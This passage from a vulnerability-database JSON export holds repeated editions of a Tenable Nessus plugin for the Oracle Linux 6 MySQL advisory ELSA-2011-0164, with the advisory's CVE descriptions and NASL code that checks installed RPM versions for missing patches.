:\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-libs-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-embedded / etc\");\n}\n", "title": "Oracle Linux 6 : mysql (ELSA-2011-0164)", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2018-09-02T00:08:01"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:mysql", "p-cpe:/a:oracle:linux:mysql-devel", "p-cpe:/a:oracle:linux:mysql-embedded", "p-cpe:/a:oracle:linux:mysql-libs", "p-cpe:/a:oracle:linux:mysql-bench", "p-cpe:/a:oracle:linux:mysql-test", "p-cpe:/a:oracle:linux:mysql-embedded-devel", "p-cpe:/a:oracle:linux:mysql-server"], "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known Binary (WKB) data, which could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a remote, authenticated attacker to cause excessive CPU use (up to 100%), if a stored procedure contained JOIN queries, and that procedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of numeric and longblob data types to the LEAST or GREATEST function, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both GROUP_CONCAT and the WITH ROLLUP modifier could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare mode, possibly allowing a remote, authenticated attacker to crash mysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a user-defined variable and that also contain a logical value evaluation could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value functions, such as LEAST and GREATEST, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed MySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex SELECT queries could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests provided by HANDLER statements could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements that define NULL columns when using the InnoDB storage engine, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the BINLOG statement caused MySQL to read unassigned memory. A remote, authenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE statements, when a NULL argument was provided as one of the arguments to the query, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to retrieve data from a unique SET column could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835, CVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680, CVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of service, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the MySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which correct these issues. After installing this update, the MySQL server daemon (mysqld) will be restarted automatically.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "f7ca52a4290fed3c389fcebecdbd9d057d7dec224cd7c50181fcafd74711b5f4", "hashmap": [{"hash": "3c5afcca913658450e43fe2cc0af5e77", "key": "description"}, {"hash": "8754a4c79639fe9e72913f51a467720c", "key": "references"}, {"hash": "52a589bac1c2c4d1b20742a5e936a6a0", "key": "cpe"}, {"hash": "28a94886eaa4ff2b55031e0322ec393e", "key": "cvelist"}, {"hash": "4579da10f367382f6c82a034cac778ad", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "44a7c372e4fd70f63bab3c202bc2425d", "key": "title"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "01747313503f2ddd0055183b17255a2e", "key": "href"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "952a2e8fc7d51d5cdf3746dd935403dd", "key": "sourceData"}, {"hash": "62f567f562bbeddeaf1e6db6eec3283c", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68184", "id": "ORACLELINUX_ELSA-2011-0164.NASL", "lastseen": "2017-10-29T13:45:01", "modified": "2016-05-06T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68184", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0164 and \n# Oracle Linux Security Advisory ELSA-2011-0164 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68184);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2016/05/06 16:53:48 $\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42596, 42598, 42599, 42625, 42633, 42638, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2011:0164\");\n\n script_name(english:\"Oracle Linux 6 : mysql (ELSA-2011-0164)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE\nstatements, when a NULL argument was provided as one of the arguments\nto the query, could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to\nretrieve data from a unique SET column could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835,\nCVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680,\nCVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of\nservice, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the\nMySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which\ncorrect these issues. After installing this update, the MySQL server\ndaemon (mysqld) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mysql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"mysql-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-bench-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-embedded-devel-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-libs-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-server-5.1.52-1.el6_0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"mysql-test-5.1.52-1.el6_0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mysql / mysql-bench / mysql-devel / mysql-embedded / etc\");\n}\n", "title": "Oracle Linux 6 : mysql (ELSA-2011-0164)", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:45:01"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:mysql", "p-cpe:/a:oracle:linux:mysql-devel", "p-cpe:/a:oracle:linux:mysql-embedded", "p-cpe:/a:oracle:linux:mysql-libs", "p-cpe:/a:oracle:linux:mysql-bench", "p-cpe:/a:oracle:linux:mysql-test", "p-cpe:/a:oracle:linux:mysql-embedded-devel", "p-cpe:/a:oracle:linux:mysql-server"], "cvelist": ["CVE-2010-3837", "CVE-2010-3680", "CVE-2010-3678", "CVE-2010-3839", "CVE-2010-3835", "CVE-2010-3681", "CVE-2010-3833", "CVE-2010-3840", "CVE-2010-3682", "CVE-2010-3679", "CVE-2010-3836", "CVE-2010-3683", "CVE-2010-3677", "CVE-2010-3838"], "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "description": "From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon (mysqld) and many client programs and libraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known Binary (WKB) data, which could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a remote, authenticated attacker to cause excessive CPU use (up to 100%), if a stored procedure contained JOIN queries, and that procedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of numeric and longblob data types to the LEAST or GREATEST function, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both GROUP_CONCAT and the WITH ROLLUP modifier could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare mode, possibly allowing a remote, authenticated attacker to crash mysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a user-defined variable and that also contain a logical value evaluation could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value functions, such as LEAST and GREATEST, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed MySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex SELECT queries could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests provided by HANDLER statements could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements that define NULL columns when using the InnoDB storage engine, could allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the BINLOG statement caused MySQL to read unassigned memory. A remote, authenticated attacker could possibly use this flaw to crash mysqld.\n(CVE-2010-3679)\n\nA flaw in the way MySQL processed SQL queries containing IN or CASE statements, when a NULL argument was provided as one of the arguments to the query, could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3678)\n\nA flaw in the way MySQL processed JOIN queries that attempt to retrieve data from a unique SET column could allow a remote, authenticated attacker to crash mysqld. (CVE-2010-3677)\n\nNote: CVE-2010-3840, CVE-2010-3838, CVE-2010-3837, CVE-2010-3835, CVE-2010-3833, CVE-2010-3682, CVE-2010-3681, CVE-2010-3680, CVE-2010-3678, and CVE-2010-3677 only cause a temporary denial of service, as mysqld was automatically restarted after each crash.\n\nThese updated packages upgrade MySQL to version 5.1.52. Refer to the MySQL release notes for a full list of changes :\n\nhttp://dev.mysql.com/doc/refman/5.1/en/news-5-1-52.html\n\nAll MySQL users should upgrade to these updated packages, which correct these issues. After installing this update, the MySQL server daemon (mysqld) will be restarted automatically.", "edition": 5, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "0efafa92bbf2e8c838cc5fc8d7d0a9a0ed318bf93ce48b4e61b9acb52a1687d5", "hashmap": [{"hash": "3c5afcca913658450e43fe2cc0af5e77", "key": "description"}, {"hash": "8754a4c79639fe9e72913f51a467720c", "key": "references"}, {"hash": "52a589bac1c2c4d1b20742a5e936a6a0", "key": "cpe"}, {"hash": "28a94886eaa4ff2b55031e0322ec393e", "key": "cvelist"}, {"hash": "4579da10f367382f6c82a034cac778ad", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "0e4da7304285381f16759537beaada44", "key": "modified"}, {"hash": "44a7c372e4fd70f63bab3c202bc2425d", "key": "title"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "bc851413348a020ba268848d2e684f0c", "key": "sourceData"}, {"hash": "01747313503f2ddd0055183b17255a2e", "key": "href"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68184", "id": "ORACLELINUX_ELSA-2011-0164.NASL", "lastseen": "2019-01-03T10:35:42", "modified": "2019-01-02T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68184", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2011-February/001871.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:0164 and \n# Oracle Linux Security Advisory ELSA-2011-0164 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68184);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/01/02 16:37:55\");\n\n script_cve_id(\"CVE-2010-3677\", \"CVE-2010-3678\", \"CVE-2010-3679\", \"CVE-2010-3680\", \"CVE-2010-3681\", \"CVE-2010-3682\", \"CVE-2010-3683\", \"CVE-2010-3833\", \"CVE-2010-3835\", \"CVE-2010-3836\", \"CVE-2010-3837\", \"CVE-2010-3838\", \"CVE-2010-3839\", \"CVE-2010-3840\");\n script_bugtraq_id(42596, 42598, 42599, 42625, 42633, 42638, 42646, 43676);\n script_xref(name:\"RHSA\", value:\"2011:0164\");\n\n script_name(english:\"Oracle Linux 6 : mysql (ELSA-2011-0164)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:0164 :\n\nUpdated mysql packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists\nof the MySQL server daemon (mysqld) and many client programs and\nlibraries.\n\nThe MySQL PolyFromWKB() function did not sanity check Well-Known\nBinary (WKB) data, which could allow a remote, authenticated attacker\nto crash mysqld. (CVE-2010-3840)\n\nA flaw in the way MySQL processed certain JOIN queries could allow a\nremote, authenticated attacker to cause excessive CPU use (up to\n100%), if a stored procedure contained JOIN queries, and that\nprocedure was executed twice in sequence. (CVE-2010-3839)\n\nA flaw in the way MySQL processed queries that provide a mixture of\nnumeric and longblob data types to the LEAST or GREATEST function,\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3838)\n\nA flaw in the way MySQL processed PREPARE statements containing both\nGROUP_CONCAT and the WITH ROLLUP modifier could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3837)\n\nMySQL did not properly pre-evaluate LIKE arguments in view prepare\nmode, possibly allowing a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3836)\n\nA flaw in the way MySQL processed statements that assign a value to a\nuser-defined variable and that also contain a logical value evaluation\ncould allow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3835)\n\nA flaw in the way MySQL evaluated the arguments of extreme-value\nfunctions, such as LEAST and GREATEST, could allow a remote,\nauthenticated attacker to crash mysqld. (CVE-2010-3833)\n\nA flaw in the way MySQL handled LOAD DATA INFILE requests allowed\nMySQL to send OK packets even when there were errors. (CVE-2010-3683)\n\nA flaw in the way MySQL processed EXPLAIN statements for some complex\nSELECT queries could allow a remote, authenticated attacker to crash\nmysqld. (CVE-2010-3682)\n\nA flaw in the way MySQL processed certain alternating READ requests\nprovided by HANDLER statements could allow a remote, authenticated\nattacker to crash mysqld. (CVE-2010-3681)\n\nA flaw in the way MySQL processed CREATE TEMPORARY TABLE statements\nthat define NULL columns when using the InnoDB storage engine, could\nallow a remote, authenticated attacker to crash mysqld.\n(CVE-2010-3680)\n\nA flaw in the way MySQL processed certain values provided to the\nBINLOG statement caused MySQL to read unassigned memory. A remote,\nauthenticated attacker could possibly use this 